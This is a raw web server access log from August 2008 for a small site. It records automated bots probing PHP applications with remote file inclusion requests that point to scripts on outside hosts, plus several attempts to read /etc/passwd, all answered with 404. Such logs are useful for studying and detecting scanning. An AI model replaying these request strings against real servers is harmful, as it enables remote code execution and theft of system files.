84.244.191.41 - - [15/Aug/2008:21:48:00 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:48:03 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:48:03 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:48:03 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:48:03 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:48:04 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:48:04 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:48:04 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:48:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:48:06 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:48:07 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:48:07 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:48:07 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:48:38 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:48:38 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:48:39 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:48:43 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:48:44 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:48:44 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:48:45 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:48:45 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:49:12 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:49:13 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:49:51 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:49:51 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:21:50:12 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:21:50:12 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:50:14 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:50:14 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:52:36 -0700] "GET /logs/access_080719.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
209.160.73.116 - - [15/Aug/2008:21:52:36 -0700] "GET /logs/access_080719.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
204.15.10.22 - - [15/Aug/2008:21:52:56 -0700] "GET /logs/access_080719.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
207.162.215.10 - - [15/Aug/2008:21:53:57 -0700] "GET /logs/access_080726.log//index.php?page=/etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
207.162.215.10 - - [15/Aug/2008:21:53:57 -0700] "GET //index.php?page=/etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
207.162.215.10 - - [15/Aug/2008:21:53:57 -0700] "GET /logs//index.php?page=/etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:55:11 -0700] "GET /logs/access_080719.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:21:55:46 -0700] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
67.19.173.36 - - [15/Aug/2008:21:55:53 -0700] "GET /logs/access.log///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
67.19.173.36 - - [15/Aug/2008:21:55:53 -0700] "GET ///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
67.19.173.36 - - [15/Aug/2008:21:55:53 -0700] "GET /logs///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:56:00 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:21:56:00 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:21:56:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
84.244.191.41 - - [15/Aug/2008:21:56:08 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:56:34 -0700] "GET /logs/access_080719.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:57:55 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
193.178.228.12 - - [15/Aug/2008:21:57:56 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:59:32 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.85.154.55 - - [15/Aug/2008:21:59:32 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
199.237.208.134 - - [15/Aug/2008:22:00:01 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.getyourselfahorse.com"
199.237.208.134 - - [15/Aug/2008:22:00:01 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:22:00:08 -0700] "GET /logs/access_080719.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
212.150.247.23 - - [15/Aug/2008:22:00:22 -0700] "GET /logs/access_080719.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:22:01:07 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:22:01:08 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:22:01:23 -0700] "GET /logs/access_080726.log//announcements.php?phpraid_dir=http://www.brumanet.com.br/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:22:01:23 -0700] "GET //announcements.php?phpraid_dir=http://www.brumanet.com.br/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
200.251.162.130 - - [15/Aug/2008:22:01:24 -0700] "GET /logs//announcements.php?phpraid_dir=http://www.brumanet.com.br/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:01:59 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:01:59 -0700] "GET /lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:01:59 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
67.19.173.36 - - [15/Aug/2008:22:02:14 -0700] "GET /logs/access_080726.log///components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.getyourselfahorse.com"
207.162.215.10 - - [15/Aug/2008:22:02:17 -0700] "GET /logs/access.log//index.php?pg=/etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
207.162.215.10 - - [15/Aug/2008:22:02:18 -0700] "GET //index.php?pg=/etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
207.162.215.10 - - [15/Aug/2008:22:02:18 -0700] "GET /logs//index.php?pg=/etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:07:03 -0700] "GET /logs/access.log//components/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:07:03 -0700] "GET //components/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:07:04 -0700] "GET /logs//components/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:22:08:26 -0700] "GET /phphtml.php?htmlclass_path=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:22:09:08 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:22:09:08 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:22:09:09 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:10:41 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:10:42 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:10:42 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:13:02 -0700] "GET /logs/access_080726.log//components/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:13:03 -0700] "GET //components/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:13:03 -0700] "GET /logs/access_080719.log/errors.php?error=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:13:03 -0700] "GET /errors.php?error=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:13:03 -0700] "GET /logs/errors.php?error=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:13:03 -0700] "GET /logs//components/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:13:09 -0700] "GET /logs/access_080726.log//ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:13:10 -0700] "GET //ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:13:10 -0700] "GET /logs//ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.getyourselfahorse.com"
62.87.154.41 - - [15/Aug/2008:22:13:56 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/amik_pam2/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:14:36 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:14:36 -0700] "GET //ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:14:36 -0700] "GET /logs//ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:17:01 -0700] "GET /logs/access_080726.log/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:17:01 -0700] "GET /errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:17:02 -0700] "GET /logs/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:17:25 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:17:26 -0700] "GET /errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
202.60.72.69 - - [15/Aug/2008:22:17:27 -0700] "GET /logs/errors.php?error=http://www.geocities.com/dvlind/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "getyourselfahorse.com"
64.15.147.86 - - [15/Aug/2008:22:18:09 -0700] "GET /logs/access_080726.log/phphtml.php?htmlclass_path=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
64.15.147.86 - - [15/Aug/2008:22:18:09 -0700] "GET /phphtml.php?htmlclass_path=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
64.15.147.86 - - [15/Aug/2008:22:18:09 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
64.15.147.86 - - [15/Aug/2008:22:18:12 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:18:29 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:18:29 -0700] "GET //ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:18:29 -0700] "GET /logs//ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
74.52.66.242 - - [15/Aug/2008:22:18:32 -0700] "GET /logs/access_080726.log/phphtml.php?htmlclass_path=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
74.52.66.242 - - [15/Aug/2008:22:18:32 -0700] "GET /phphtml.php?htmlclass_path=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
74.52.66.242 - - [15/Aug/2008:22:18:32 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
74.52.66.242 - - [15/Aug/2008:22:18:34 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:18:39 -0700] "GET /logs/access_080726.log//ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:18:39 -0700] "GET //ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:18:40 -0700] "GET /logs//ashnews.php?pathtoashnews=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
62.169.0.50 - - [15/Aug/2008:22:19:38 -0700] "GET /logs/access_080719.log//admin/classes/TplLoad.php?full_path_to_public_program=http://makemoneymania.info/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.191.62.117 - - [15/Aug/2008:22:20:20 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://yeonkok.puru.net/img/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.getyourselfahorse.com"
207.162.215.10 - - [15/Aug/2008:22:20:54 -0700] "GET //index.php?page=/etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:21:59 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:21:59 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:21:59 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:25:19 -0700] "GET /logs/access.log//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:25:19 -0700] "GET //Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
206.252.131.151 - - [15/Aug/2008:22:25:19 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://septimamaipu.cl/septima/mambots/idxscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:25:41 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:25:41 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:25:42 -0700] "GET /lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:25:42 -0700] "GET /lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:25:42 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
82.98.78.92 - - [15/Aug/2008:22:25:42 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
